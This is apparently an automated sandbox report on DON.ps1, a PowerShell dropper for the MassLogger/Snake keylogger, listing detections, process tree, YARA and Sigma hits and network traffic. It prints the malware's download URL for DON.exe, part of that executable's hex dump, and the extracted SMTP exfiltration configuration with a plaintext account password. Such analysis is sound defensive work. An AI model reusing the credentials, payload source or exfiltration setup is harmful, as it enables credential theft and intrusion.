Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DON.ps1

Overview

General Information

Sample name:DON.ps1
Analysis ID:1638293
MD5:e2fcebe8b83f6ed9a980c50163081dea
SHA1:340c99bce0ede926ac7dfd7a092ca080c44539e0
SHA256:c6cfa595bfd62eda920d105f23b3f3c26e05e894784b4059b38d57c7bb778597
Tags:ps1user-TornadoAV_dev
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 6428 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E49DBDCF9C9CCA18487D278FF701AE42)
      • x.exe (PID: 4624 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E49DBDCF9C9CCA18487D278FF701AE42)
  • notepad.exe (PID: 7096 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\DON.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 6868 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "thejaswi@tsengg.com", "Password": "@bettermoney3490", "Server": "mail.tsengg.com"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
    dump.pcapWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x11dd6:$a1: get_encryptedPassword
    • 0x12112:$a2: get_encryptedUsername
    • 0x11b1d:$a3: get_timePasswordChanged
    • 0x11c3e:$a4: get_passwordField
    • 0x11dec:$a5: set_encryptedPassword
    • 0x13966:$a7: get_logins
    • 0x13585:$a8: GetOutlookPasswords
    • 0x13363:$a9: StartKeylogger
    • 0x138b6:$a10: KeyLoggerEventArgs
    • 0x133c0:$a11: KeyLoggerEventArgsEventHandler

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
          00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x769:$a1: get_encryptedPassword
            • 0xaa5:$a2: get_encryptedUsername
            • 0x617:$a4: get_passwordField
            • 0x77f:$a5: set_encryptedPassword
            • 0x214f:$a7: get_logins
            • 0x1e00:$a8: GetOutlookPasswords
            • 0x1bde:$a9: StartKeylogger
            • 0x209f:$a10: KeyLoggerEventArgs
            • 0x1c3b:$a11: KeyLoggerEventArgsEventHandler
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.x.exe.2b89bb4.2.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
              4.2.x.exe.2b89bb4.2.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                4.2.x.exe.2b85378.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                  4.2.x.exe.2b85378.0.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                    5.2.x.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                      Click to see the 17 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", ProcessId: 6676, ProcessName: powershell.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 103.21.58.29, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\x.exe, Initiated: true, ProcessId: 4624, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49710
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1", ProcessId: 6676, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6868, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T11:06:34.229323+010028032742Potentially Bad Traffic192.168.2.1149708132.226.247.7380TCP
                      2025-03-14T11:06:40.447341+010028032742Potentially Bad Traffic192.168.2.1149708132.226.247.7380TCP
                      2025-03-14T11:06:49.556721+010028032742Potentially Bad Traffic192.168.2.1149719132.226.247.7380TCP
                      2025-03-14T11:07:47.572412+010028032742Potentially Bad Traffic192.168.2.1149734132.226.247.7380TCP
                      2025-03-14T11:08:14.025705+010028032742Potentially Bad Traffic192.168.2.1149742132.226.247.7380TCP
                      2025-03-14T11:08:14.994475+010028032742Potentially Bad Traffic192.168.2.1149744132.226.247.7380TCP
                      2025-03-14T11:08:18.603769+010028032742Potentially Bad Traffic192.168.2.1149746132.226.247.7380TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllAvira: detection malicious, Label: TR/Injector.vqojt
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Injector.vqojt
                      Found malware configuration
                      Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "thejaswi@tsengg.com", "Password": "@bettermoney3490", "Server": "mail.tsengg.com"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 70%
                      Multi AV Scanner detection for submitted file
                      Source: DON.ps1Virustotal: Detection: 20%Perma Link
                      Source: DON.ps1ReversingLabs: Detection: 28%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.11:49709 version: TLS 1.0
                      Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1110223011.00000000006F2000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00D547D8h4_2_00D54688
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00D5482Eh4_2_00D54688
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 02AA9731h5_2_02AA9480
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 02AA9E5Ah5_2_02AA9A40
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 02AA9E5Ah5_2_02AA9A30
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 02AA9E5Ah5_2_02AA9D87
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov ecx, 000003E8h5_2_06552090
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov ecx, 000003E8h5_2_06552082
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then push 00000000h5_2_0655E1E8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_0655E1E8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then push 00000000h5_2_0655ED33
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then push 00000000h5_2_0706A3B8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0706C266h5_2_0706BEF4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0706C266h5_2_0706C1B5
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_0706B1D3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then push 00000000h5_2_0706AF10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_0706BC69
                      Source: global trafficTCP traffic: 192.168.2.11:49710 -> 103.21.58.29:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 10:06:32 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 10 Feb 2025 00:54:45 GMTETag: "18000-62dbf2787c818"Accept-Ranges: bytesContent-Length: 98304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d1 6e 48 b1 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 76 01 00 00 08 00 00 00 00 00 00 de 95 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 95 01 00 4f 00 00 00 00 a0 01 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 75 01 00 00 20 00 00 00 76 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 05 00 00 00 a0 01 00 00 06 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 95 01 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 dd 00 00 b4 b7 00 00 03 00 00 00 5a 00 00 06 20 dd 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7d fc 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 00 01 02 03 04 06 08 08 00 00 00 00 00 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 1e 02 28 1f 00 00 0a 2a 26 00 02 28 20 00 00 0a 00 2a ce 73 21 00 00 0a 80 01 00 00 04 73 22 00 00 0a 80 02 00 00 04 73 23 00 00 0a 80 03 00 00 04 73 24 00 00 0a 80 04 00 00 04 73 25 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 38 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 39 00 00 0a 00 2a 26 00 03 fe 15 06 00 00 1b 2a 22 00 02 80 09 00 00 04 2a 56 73 1d 00 00 06 28 42 00 00 0a 74 09 00 00 02 80 0a 00 00 04 2a 1e 02 28 43 00 00 0a 2a 22 7e 13 00 00 04 2b 00 2a 22 7e 14 00 00 04 2b 00 2a 22 7e 15 00 00 04 2b 00 2a 22 7e 16 00 00 04 2b 00 2a 22 7e 17 00 00 04 2b 00 2a 62 00 72
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/DON.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                      Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49719 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49708 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49734 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49742 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49744 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49746 -> 132.226.247.73:80
                      Source: global trafficTCP traffic: 192.168.2.11:49710 -> 103.21.58.29:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
